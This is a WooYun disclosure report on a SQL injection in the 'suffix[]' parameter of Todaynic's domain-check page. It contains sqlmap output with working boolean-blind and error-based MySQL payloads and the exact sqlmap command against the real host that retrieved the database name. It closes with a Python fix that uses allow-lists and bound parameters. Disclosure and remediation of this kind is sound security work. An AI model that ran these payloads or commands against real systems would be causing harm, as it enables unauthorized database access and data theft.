Domain registrar security: an SQL injection on the 时代互联 (Todaynic) main site

2015-08-15 01:00

Code area
ST parameter 'suffix[]' is vulnerable. Do you want to keep testing the others y
sqlmap identified the following injection points with a total of 733 HTTP(s) requests:
---
Parameter: suffix[] (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: query=angelina&suffix[]=.cn' RLIKE (SELECT (CASE WHEN (3859=3859) THEN 0x2e636e ELSE 0x28 END)) AND 'obeI'='obeI

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: query=angelina&suffix[]=.cn' AND EXTRACTVALUE(4567,CONCAT(0x5c,0x716b6a6b71,(SELECT (ELT(4567=4567,1))),0x717a7a7171)) AND 'VUxD'='VUxD
---
[10:17:38] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.29, PHP 5.5.23
back-end DBMS: MySQL 5.1
[10:17:38] [INFO] fetching database names
[10:17:38] [WARNING] the SQL query provided does not return any output
[10:17:38] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[10:17:38] [INFO] fetching number of databases
[10:17:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:17:38] [INFO] retrieved:
[10:17:39] [ERROR] unable to retrieve the number of databases
[10:17:39] [INFO] falling back to current database
[10:17:39] [INFO] fetching current database
[10:17:39] [INFO] retrieved: db_now_net_cn
available databases [1]:
[*] db_now_net_cn

Proof of vulnerability:

Code area
./sqlmap.py -u "http://en.todaynic.com:80/whois/domaincheck.php" --data="query=angelina&suffix%5B%5D=.cn" --dbs


The domain name is different, but the database dumped here is the main site's database.

Fix recommendation:
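An added example, not code from the report or from the site: the injection lands in `suffix[]`, a PHP array parameter whose elements reach the WHERE clause, so a hardened lookup treats every array element as untrusted, checks it against an allow-list, and binds it as a query parameter. The Python below does that for a reconstructed domain-availability check over a constructed SQLite table; the table, the allow-list and the function names are assumptions.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed allow-list: the only suffixes the lookup form is meant to accept.
ALLOWED_SUFFIXES = {".com", ".net", ".org", ".cn", ".com.cn"}
# One lower-case DNS label: letters, digits, inner hyphens, at most 63 chars.
LABEL_RE = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$")


def parse_form(body):
    """Parse the POST body with PHP-style array semantics: each repeated
    'suffix[]' field is one element, and every element is validated."""
    fields = parse_qs(body, keep_blank_values=True)
    query = fields.get("query", [""])[0].strip().lower()
    suffixes = fields.get("suffix[]", [])
    if not LABEL_RE.match(query):
        raise ValueError(f"rejected query label: {query!r}")
    if not suffixes:
        raise ValueError("rejected: no suffix given")
    bad = [s for s in suffixes if s not in ALLOWED_SUFFIXES]
    if bad:  # an array element is attacker-controlled just like a scalar field
        raise ValueError(f"rejected suffix values: {bad!r}")
    return query, suffixes


def check_domains(conn, body):
    """Return {domain: available}. The array length only decides how many '?'
    placeholders are emitted; user data never becomes part of the SQL text."""
    query, suffixes = parse_form(body)
    names = [query + s for s in suffixes]
    placeholders = ",".join("?" * len(names))
    sql = f"SELECT domain FROM registered WHERE domain IN ({placeholders})"
    taken = {row[0] for row in conn.execute(sql, names)}
    return {name: name not in taken for name in names}


def rejection_reason(conn, body):
    """None when the request is served, otherwise the validation error text."""
    try:
        check_domains(conn, body)
        return None
    except ValueError as exc:
        return str(exc)


def demo_db():
    """Constructed in-memory stand-in for a registrar's domain table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE registered (domain TEXT PRIMARY KEY)")
    conn.executemany("INSERT INTO registered VALUES (?)", [("angelina.cn",), ("angelina.com",)])
    return conn
```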

Source: www.wooyun.org/bugs/wooyun-2015-0132989
